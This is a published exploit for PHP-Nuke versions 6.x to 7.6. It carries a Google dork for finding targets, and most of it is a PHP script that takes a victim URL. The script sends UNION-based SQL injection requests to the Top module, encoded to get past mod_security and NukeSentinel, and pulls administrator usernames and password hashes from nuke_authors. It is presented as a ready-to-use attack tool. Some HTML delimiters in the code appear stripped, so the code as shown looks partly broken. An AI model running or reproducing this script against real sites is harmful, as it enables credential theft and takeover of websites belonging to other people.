PHP-Nuke SQL injection / Bypass Protections

# Exploit Title: PHP-Nuke ( SQL injection Top Module + protection Bypass ) # Google Dork: intext: Powered by PHP-Nuke # Date: 2024-10-07 # Exploit Author: Emiliano Febbi # Vendor Homepage: https://phpnuke.org/ # Software Link: https://sourceforge.net/projects/phpnuke/files/phpnuke/ # Version: 6.x < 7.6 # Tested on: Windows 10 [code] ->New concept of exploit writing, CMS protections are useless. ->Very fast usage. PHP-Nuke SQL injection / Bypass Protections

new exploit concept
######################################################################
#This exploit is for Top Module of PHP-Nuke 6.x < 7.6                #
#auto-bypass *illegal operation* , *mod security* , *NukeSentinel*   #
#allowed http and https protocols. Code by Emiliano Febbi            #
######################################################################

'; if($_POST['victim']) { $site = $_POST['victim']; $j = $_POST['exploit_nuke']; switch ($j) { /*#method1*/ case "one": /*#Get info from victim site*/ if (false!==file("$site/admin.php")) echo "~Admin Login Found!

"; else echo "~missing Admin Login

"; if (false!==file("$site/modules.php?name=Top")) echo "#Top Module Active!
"; else echo "#Top Module not Active!
"; print '--------------------------------------
'; /*#Get user1*/ print "#user1:
"; $content_user=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--"); $comment_user=explode('',$content_user); $comment_user=explode("",$comment_user[1]); var_dump(strip_tags($comment_user[0])); echo "
"; /*#Get pwd1*/ print "#password1:
"; $content=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--"); $comment=explode('',$content); $comment=explode("",$comment[1]); var_dump(strip_tags($comment[0])); echo "
"; /*#Get user2*/ print "#user2:
"; $content_user2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--"); $comment_user2=explode('',$content_user2); $comment_user2=explode("",$comment_user2[2]); var_dump(strip_tags($comment_user2[0])); echo "
"; /*#Get pwd2*/ print "#password2:
"; $content2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--"); $comment2=explode('',$content2); $comment2=explode("",$comment2[2]); var_dump(strip_tags($comment2[0])); echo "
"; break; /*###################################################################################################################################*/ case "two": /*#method2*/ /*#Get info from victim site*/ if (false!==file("$site/admin.php")) echo "~Admin Login Found!

"; else echo "~missing Admin Login

"; if (false!==file("$site/modules.php?name=Top")) echo "#Top Module Active!
"; else echo "#Top Module not Active!
"; print '--------------------------------------
'; /*#Get user1*/ print "#user1:
"; $content_userj=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--"); $comment_userj=explode('',$content_userj); $comment_userj=explode("",$comment_userj[1]); var_dump(strip_tags($comment_userj[0])); echo "
"; /*#Get pwd1*/ print "#password1:
"; $content_userp=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--"); $comment_userp=explode('',$content_userp); $comment_userp=explode("",$comment_userp[1]); var_dump(strip_tags($comment_userp[0])); echo "
"; /*#Get user2*/ print "#user2:
"; $content_userz=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--"); $comment_userz=explode('',$content_userz); $comment_userz=explode("",$comment_userz[2]); var_dump(strip_tags($comment_userz[0])); echo "
"; /*#Get pwd2*/ print "#password2:
"; $content_userq=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--"); $comment_userq=explode('',$content_userq); $comment_userq=explode("",$comment_userq[2]); var_dump(strip_tags($comment_userq[0])); echo "
"; break; };; };;; ?> [/code]